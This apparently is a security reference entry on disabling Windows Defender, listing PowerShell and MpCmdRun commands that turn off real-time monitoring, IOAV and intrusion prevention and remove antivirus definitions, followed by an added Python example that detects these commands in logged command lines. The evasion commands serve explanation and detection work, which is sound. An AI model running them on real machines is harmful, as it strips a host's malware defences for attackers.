This technique disables Windows Defender’s real-time protection, removes antivirus definitions, and turns off additional security features (IOAV protection and the intrusion prevention system). Attackers use this to bypass Windows Defender (AV) and AMSI protections, allowing execution of malicious payloads without interference. Running these commands requires Administrator privileges.
Commands:
Set-MPPreference -DisableRealTimeMonitoring $true
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Get-MPPreference
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
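
For detection, the commands above can be matched in logged command lines. The following is an added example, not part of the original page: it assumes command lines are already collected per host (for instance from process-creation or PowerShell script-block logging), and it goes beyond the three switches listed by flagging any `-Disable*` parameter set to a true value. The host names, sample events and severity rule are constructed for illustration.

```python
import re

# Any Set-MpPreference -Disable* parameter given a true value. PowerShell is
# case-insensitive and accepts "-Name $true", "-Name:$true" and "-Name 1".
DISABLE_TRUE = re.compile(r"-(Disable\w+)[\s:]+(?:\$true|1)\b", re.IGNORECASE)
SET_PREF = re.compile(r"\bSet-MpPreference\b", re.IGNORECASE)
# MpCmdRun.exe invoked with -RemoveDefinitions (signature removal).
REMOVE_DEFS = re.compile(r"MpCmdRun(?:\.exe)?\b.*-RemoveDefinitions\b", re.IGNORECASE)

def classify(command_line):
    """Return (finding, detail) pairs for one logged command line."""
    findings = []
    if SET_PREF.search(command_line):
        for name in DISABLE_TRUE.findall(command_line):
            findings.append(("defender_protection_disabled", name))
    if REMOVE_DEFS.search(command_line):
        findings.append(("defender_definitions_removed", "-RemoveDefinitions"))
    return findings

def scan(events):
    """events: iterable of (host, command_line). Returns alerts and per-host severity."""
    alerts, kinds_by_host = [], {}
    for host, command_line in events:
        for finding, detail in classify(command_line):
            alerts.append((host, finding, detail))
            kinds_by_host.setdefault(host, set()).add(finding)
    # Both tampering kinds on one host is treated as higher severity (assumed policy).
    severity = {h: "high" if len(k) > 1 else "medium" for h, k in kinds_by_host.items()}
    return alerts, severity

# Constructed sample events (host names and lines are made up for this example).
SAMPLE_EVENTS = [
    ("WS-014", r'Set-MPPreference -DisableRealTimeMonitoring $true'),
    ("WS-014", r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    ("WS-014", r'Get-MPPreference'),
    ("WS-014", r'Set-MPPreference -DisableIOAVProtection $true'),
    ("WS-022", r'set-mppreference -disableintrusionpreventionsystem:1'),
    ("WS-031", r'Set-MpPreference -DisableRealtimeMonitoring $false'),
    ("WS-031", r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate'),
]

if __name__ == "__main__":
    alerts, severity = scan(SAMPLE_EVENTS)
    for alert in alerts:
        print(alert)
    print(severity)
```

The read-only `Get-MPPreference` call, the `$false` (re-enable) call and the signature update are intentionally not flagged.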